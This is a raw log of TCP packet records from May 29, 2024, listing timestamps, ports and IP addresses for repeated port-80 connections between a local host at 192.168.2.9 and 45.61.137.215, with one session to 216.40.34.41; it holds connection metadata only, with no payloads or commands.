May 29, 2024 15:42:15.221185923 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.221185923 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.221185923 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.221223116 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.221292973 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.221292973 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.225784063 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.225799084 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.225811005 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.225821972 CEST	80	49714	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.225855112 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.225855112 CEST	49714	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.288310051 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.293196917 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.293373108 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.295733929 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.300664902 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:15.300714016 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:15.305510044 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733454943 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733470917 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733504057 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733521938 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733521938 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.733532906 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733547926 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733556032 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.733557940 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733570099 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733575106 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.733575106 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.733580112 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733597994 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.733603001 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.733603001 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.733639002 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.733639002 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.733688116 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.739729881 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.739752054 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.739774942 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.739783049 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.739783049 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.739798069 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.739808083 CEST	80	49715	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.739825010 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.739846945 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.739846945 CEST	49715	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.873842955 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.878889084 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.878957033 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.880991936 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.885925055 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:17.885970116 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:17.891011000 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394320965 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394346952 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394360065 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394371033 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394383907 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394393921 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394406080 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394413948 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.394417048 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394431114 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394444942 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.394454956 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.394454956 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.394480944 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.394534111 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.399476051 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.399571896 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.399605989 CEST	80	49716	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.399758101 CEST	49716	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.537420034 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.542587042 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.542661905 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.544811010 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.549726009 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:20.549853086 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:20.554774046 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.020756960 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.020812035 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.020824909 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.020839930 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.020898104 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.020898104 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.020953894 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.020979881 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.020993948 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.021008015 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.021008015 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.021027088 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.021039963 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.021049023 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.021049023 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.021079063 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.021105051 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.021105051 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.022480011 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.025801897 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.025846004 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.025861025 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.025878906 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.025893927 CEST	80	49717	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.025901079 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.025901079 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.025901079 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.025922060 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.026173115 CEST	49717	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.169270039 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.174407959 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.174519062 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.177150011 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.182085037 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:26.182188988 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:26.187014103 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595372915 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595396042 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595407963 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595417976 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595432997 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595453024 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.595504999 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.595541954 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595556974 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595567942 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.595582962 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.595607996 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595611095 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.595635891 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595649004 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.595663071 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.595670938 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.595698118 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.600439072 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.600478888 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.600501060 CEST	80	49720	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.600523949 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.600547075 CEST	49720	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.733258009 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.738081932 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.738545895 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.740547895 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.745652914 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:28.746519089 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:28.751307964 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195296049 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195326090 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195338011 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195364952 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195378065 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195385933 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195491076 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.195542097 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195563078 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195574999 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195584059 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.195602894 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.195627928 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.195857048 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.195887089 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.195897102 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.200875044 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.200889111 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.200932980 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.200937986 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.200952053 CEST	80	49721	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.200982094 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.201006889 CEST	49721	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.339399099 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.344300032 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.344382048 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.346168041 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.351005077 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:31.351063013 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:31.355932951 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810412884 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810427904 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810446978 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810458899 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810468912 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810487986 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810497999 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810503960 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810512066 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810518980 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.810522079 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.810519934 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.810555935 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.810631990 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.810631990 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.815593958 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.815628052 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.815653086 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.815670967 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.815686941 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.815768957 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.815813065 CEST	80	49722	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.815855026 CEST	49722	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.977935076 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.983030081 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.983150959 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.985204935 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.991365910 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:33.991444111 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:33.996321917 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.437865019 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.437973976 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.438196898 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.438206911 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.438265085 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.438273907 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.438282013 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.438306093 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.438306093 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.438306093 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.438338041 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.438338041 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.438338041 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.438488960 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.438508987 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.438519001 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.438544989 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.438564062 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.443768978 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.443789959 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.443835020 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.443886042 CEST	80	49723	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.443888903 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.443888903 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.443888903 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.443949938 CEST	49723	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.738734961 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.743930101 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.744075060 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.746085882 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.750982046 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:36.751032114 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:36.755935907 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.194941998 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.194978952 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.194992065 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.195003986 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.195017099 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.195029020 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.195169926 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.195235968 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.195656061 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.195713043 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.195735931 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.195751905 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.195759058 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.195765972 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.195806980 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.195806980 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.200150013 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.200206995 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.200220108 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.200232029 CEST	80	49724	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.200247049 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.200268984 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.200285912 CEST	49724	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.346873999 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.352154016 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.352262020 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.353995085 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.358822107 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:39.358983040 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:39.363790989 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.803802013 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.803814888 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.803833008 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.803842068 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.803853035 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.803885937 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.803896904 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.803925037 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.803925037 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.803978920 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.803978920 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.804090977 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.804133892 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.804143906 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.804176092 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.804176092 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.804511070 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.808917046 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.808964968 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.808974981 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.808984041 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.809014082 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.809014082 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.809144020 CEST	80	49725	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.809190035 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.809190035 CEST	49725	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.950977087 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.959014893 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.959203005 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.960860968 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.967304945 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:41.967647076 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:41.973512888 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:46.502511978 CEST	49727	80	192.168.2.9	216.40.34.41
May 29, 2024 15:42:46.507404089 CEST	80	49727	216.40.34.41	192.168.2.9
May 29, 2024 15:42:46.507479906 CEST	49727	80	192.168.2.9	216.40.34.41
May 29, 2024 15:42:46.507601976 CEST	49727	80	192.168.2.9	216.40.34.41
May 29, 2024 15:42:46.512434006 CEST	80	49727	216.40.34.41	192.168.2.9
May 29, 2024 15:42:47.000524998 CEST	49727	80	192.168.2.9	216.40.34.41
May 29, 2024 15:42:47.005925894 CEST	80	49727	216.40.34.41	192.168.2.9
May 29, 2024 15:42:47.005995989 CEST	49727	80	192.168.2.9	216.40.34.41
May 29, 2024 15:42:47.378247976 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.378268003 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.378283024 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.378297091 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.378313065 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.378329039 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.378350019 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.378384113 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.378385067 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.378400087 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.378415108 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.378489971 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.378504038 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.378711939 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.378760099 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.386032104 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.386049986 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.386065960 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.386080980 CEST	80	49726	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.386204958 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.386523962 CEST	49726	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.530183077 CEST	49728	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.535202980 CEST	80	49728	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.535310984 CEST	49728	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.538290977 CEST	49728	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.543200016 CEST	80	49728	45.61.137.215	192.168.2.9
May 29, 2024 15:42:47.543272018 CEST	49728	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:47.548265934 CEST	80	49728	45.61.137.215	192.168.2.9
May 29, 2024 15:42:50.098850965 CEST	80	49728	45.61.137.215	192.168.2.9
May 29, 2024 15:42:50.098864079 CEST	80	49728	45.61.137.215	192.168.2.9
May 29, 2024 15:42:50.098875999 CEST	80	49728	45.61.137.215	192.168.2.9
May 29, 2024 15:42:50.099004984 CEST	49728	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:50.099109888 CEST	49728	80	192.168.2.9	45.61.137.215
May 29, 2024 15:42:50.099153996 CEST	80	49728	45.61.137.215	192.168.2.9
May 29, 2024 15:42:50.099164009 CEST	80	49728	45.61.137.215	192.168.2.9
May 29, 2024 15:42:50.099183083 CEST	80	49728	45.61.137.215	192.168.2.9
May 29, 2024 15:42:50.099195004 CEST	80	49728	45.61.137.215	192.168.2.9
